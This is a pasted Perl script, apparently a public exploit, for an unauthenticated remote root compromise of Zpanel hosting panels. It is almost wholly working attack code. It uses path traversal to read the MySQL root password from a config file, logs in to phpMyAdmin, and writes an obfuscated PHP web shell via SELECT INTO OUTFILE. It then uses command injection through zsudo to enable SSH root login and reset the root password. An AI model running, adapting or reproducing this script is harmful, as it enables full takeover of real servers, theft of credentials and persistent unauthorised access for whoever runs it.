SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/perl | |
2 | #******************************************************************************** | |
3 | # | |
4 | # | |
5 | # Unauthenticated Zpanel Remote Root Exploit | |
6 | # japp@0xlabs.com | |
7 | # http://www.0xlabs.com | |
8 | # | |
9 | # | |
10 | #******************************************************************************** | |
11 | ||
12 | ||
13 | use LWP::UserAgent; | |
14 | ||
15 | $FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php"; | |
16 | $PMA_PATH = "etc/apps/phpmyadmin/index.php"; | |
17 | $PMA_DOCROOT = "etc/apps/phpmyadmin/import.php"; | |
18 | ||
19 | print "\n\n"; | |
20 | print "\t================================\n"; | |
21 | print "\t[ Zpanel Remote Root Exploit ]\n"; | |
22 | print "\t[ By japp\@0xlabs.com ]\n"; | |
23 | print "\t[ www.0xlabs.com ]\n"; | |
24 | print "\t================================\n\n"; | |
25 | ||
26 | ||
27 | my $argc = @ARGV; | |
28 | ||
29 | if ( $argc != 1 ) | |
30 | { | |
31 | print " [*] Usage: ".$0." <http://localhost/zpanel/>\n"; | |
32 | exit 1; | |
33 | } | |
34 | ||
35 | my $ua = http_handler(); | |
36 | my $url = $ARGV[0]; | |
37 | ||
38 | if ( $url !~ /^http/ ){ $url = "http://".$url; } | |
39 | if ( $url !~ /\/$/ ) { $url .= "/"; } | |
40 | ||
41 | print " [*] Trying to get MySQL root password...\n"; | |
42 | my $root_pass = GetPasswd ($url, $ua); | |
43 | print " [+] Mysql root password: ".$root_pass."\n"; | |
44 | ||
45 | print " [*] Trying to access through phpMyAdmin...\n"; | |
46 | my $token = AccessPma ($root_pass, $url, $ua); | |
47 | print " [+] Login successfully\n"; | |
48 | ||
49 | print " [*] Getting Zpanel document root...\n"; | |
50 | my $docroot = GetDocRoot ($token, $url, $ua); | |
51 | print " [+] Zpanel document root: ".$docroot."\n"; | |
52 | ||
53 | print " [*] Uploading shell...\n"; | |
54 | UploadShell ($token, $docroot, $url, $ua); | |
55 | print " [+] Shell uploaded successfully!\n"; | |
56 | ||
57 | print " [+] Enabling SSH root login\n"; | |
58 | EnableRoot ($url, $ua); | |
59 | ||
60 | print " [*] Changing root password...\n"; | |
61 | ChangePasswd ($url, $ua); | |
62 | ||
63 | print " [+] Root password changed\n\n"; | |
64 | print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n"; | |
65 | ||
66 | sub ChangePasswd | |
67 | { | |
68 | my $url = $_[0]; | |
69 | my $ua = $_[1]; | |
70 | ||
71 | my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\""); | |
72 | } | |
73 | ||
74 | sub EnableRoot | |
75 | { | |
76 | my $url = $_[0]; | |
77 | my $ua = $_[1]; | |
78 | ||
79 | my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\""); | |
80 | ||
81 | } | |
82 | ||
83 | sub UploadShell | |
84 | { | |
85 | my $token = $_[0]; | |
86 | my $docroot = $_[1]; | |
87 | my $url = $_[2]; | |
88 | my $ua = $_[3]; | |
89 | ||
90 | my %pdata; | |
91 | ||
92 | $pdata{"token"} = $token; | |
93 | $pdata{"sql_query"} = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'"; | |
94 | $pdata{"ajax_request"} = "true"; | |
95 | ||
96 | http_post ($url.$PMA_DOCROOT, $ua, %pdata); | |
97 | ||
98 | my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz"); | |
99 | ||
100 | if (!$rsp->is_success) | |
101 | { | |
102 | die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n"); | |
103 | } | |
104 | my $cont = $rsp->content; | |
105 | ||
106 | if ( $cont !~ /0xlabs_rulz/ ) | |
107 | { | |
108 | die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n"); | |
109 | } | |
110 | } | |
111 | ||
112 | sub GetDocRoot | |
113 | { | |
114 | my $token = $_[0]; | |
115 | my $url = $_[1]; | |
116 | my $ua = $_[2]; | |
117 | ||
118 | my %pdata; | |
119 | ||
120 | $pdata{"token"} = $token; | |
121 | $pdata{"sql_query"} = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'"; | |
122 | $pdata{"ajax_request"} = "true"; | |
123 | ||
124 | my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata); | |
125 | ||
126 | $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/; | |
127 | ||
128 | return $1; | |
129 | } | |
130 | ||
131 | sub AccessPma | |
132 | { | |
133 | my $root_pass = $_[0]; | |
134 | my $url = $_[1]; | |
135 | my $ua = $_[2]; | |
136 | ||
137 | my %pdata; | |
138 | ||
139 | my $rsp = $ua->get ($url.$PMA_PATH); | |
140 | ||
141 | if (!$rsp->is_success) { | |
142 | die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n"); | |
143 | } | |
144 | ||
145 | my $cont = $rsp->content; | |
146 | ||
147 | $cont =~ /name=\"token\" value=\"(.+)\"/; | |
148 | ||
149 | my $token = $1; | |
150 | ||
151 | $pdata{"pma_username"} = "root"; | |
152 | $pdata{"pma_password"} = $root_pass; | |
153 | $pdata{"server"} = "1"; | |
154 | $pdata{"lang"} = "en"; | |
155 | $pdata{"collation_connection"} = "utf8_general_ci"; | |
156 | $pdata{"token"} = $token; | |
157 | ||
158 | $cont = http_post ($url.$PMA_PATH, $ua, %pdata); | |
159 | ||
160 | if ( $cont =~ /Cannot log in to the MySQL server/ ) | |
161 | { | |
162 | die (" [-] Cannot log in to phpMyAdmin\n"); | |
163 | } | |
164 | ||
165 | $cont =~ /\?token=(.+)\"/; | |
166 | ||
167 | return $1; | |
168 | } | |
169 | ||
170 | ||
171 | ||
172 | sub GetPasswd | |
173 | { | |
174 | my $url = $_[0]; | |
175 | my $ua = $_[1]; | |
176 | ||
177 | ||
178 | my $rsp = $ua->get ($url.$FILE_DISCLOSURE); | |
179 | ||
180 | if (!$rsp->is_success) { | |
181 | die (" [-] Can't get '".$url."'. Check URL.\n"); | |
182 | } | |
183 | ||
184 | my $cont = $rsp->content; | |
185 | ||
186 | if ( $cont !~ /root/ ) | |
187 | { | |
188 | die (" [-] Can't get root password. Patched?\n"); | |
189 | } | |
190 | ||
191 | my $flag = 0; | |
192 | while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g ) | |
193 | { | |
194 | $flag++; | |
195 | if ( $flag == 4 ) | |
196 | { | |
197 | return $1; | |
198 | } | |
199 | } | |
200 | ||
201 | } | |
202 | ||
203 | sub http_post | |
204 | { | |
205 | my ($host, $ua, %data) = @_; | |
206 | ||
207 | my $rsp = $ua->post ($host, [%data]); | |
208 | ||
209 | return ($rsp->content); | |
210 | } | |
211 | ||
212 | sub http_handler | |
213 | { | |
214 | my $newhandler = LWP::UserAgent->new() or return -1; | |
215 | ||
216 | $newhandler->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6"); | |
217 | $newhandler->timeout(10); | |
218 | $newhandler->protocols_allowed(['http','https']); | |
219 | $newhandler->cookie_jar( {} ); | |
220 | ||
221 | push @{ $newhandler->requests_redirectable }, 'GET'; | |
222 | push @{ $newhandler->requests_redirectable }, 'POST'; | |
223 | ||
224 | return $newhandler; | |
225 | } |